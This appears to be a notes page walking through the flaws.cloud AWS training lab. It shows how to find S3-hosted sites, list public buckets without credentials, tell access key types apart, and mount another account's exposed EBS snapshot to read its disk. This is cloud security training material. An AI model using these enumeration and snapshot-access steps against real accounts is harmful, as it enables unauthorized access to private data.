Enumeration

Check if the resolved domain contains the word "website".

You can access the static website at: flaws.cloud.s3-website-us-west-2.amazonaws.com or the bucket at: flaws.cloud.s3-us-west-2.amazonaws.com.

If you try to access a bucket but specify a different region in the domain name (for example, the bucket is in bucket.s3.amazonaws.com but you are trying to access bucket.s3-website-us-west-2.amazonaws.com), you will be redirected to the correct location.

Test to see if a website is hosted in an s3 bucket

dig +nocmd flaws.cloud any +multiline +noall +answer
get IP address

Put IP in browser - it will redirect to AWS console s3 page.

Run nslookup on the IP to get the AWS s3 website

Check for common s3 bucket misconfigurations

/bucketflaws.sh -u flaws.cloud -o -p -d

Using the AWS cli

aws s3 ls  s3://flaws.cloud/ --no-sign-request --region us-west-2

Will list the files in the bucket

You can also list the files by going to http://flaws.cloud.s3.amazonaws.com/

S3 bucket with "Everyone" having "List" permissions

Different Types of Access Keys

AKIAJ366LIPB4IJKT7SA = long term access key - note the AKIA

ASIAJ366LIJGULDN21D = session access key - note the ASIA

Get Snapshots

AWS allows you to take snapshots of EC2 and databases (RDS). The main purpose for this is to create backup copies, but sometimes users use snapshots to regain access to their own EC2s if they forget passwords.

Look for snapshots that this user has access to (note the SnapshotId):

remember to include the --owner-id else you will get a lot of output that is not relevant

aws ec2 describe-snapshots --profile flaws3 --owner-id 975426262029 --region us-west-2
get SnapshotId
aws ec2 create-volume --profile default --availability-zone us-west-2a --region us-west-2 --snapshot-id snap-0b49342abd1bdcb89    
launch an ec2 instance and attach the volume

run lsblk to see if disk is attached

Then run sudo mount /dev/xvdf1 /mnt to mount the drive, browse to /mnt to view snapshot disk

Last updated

Was this helpful?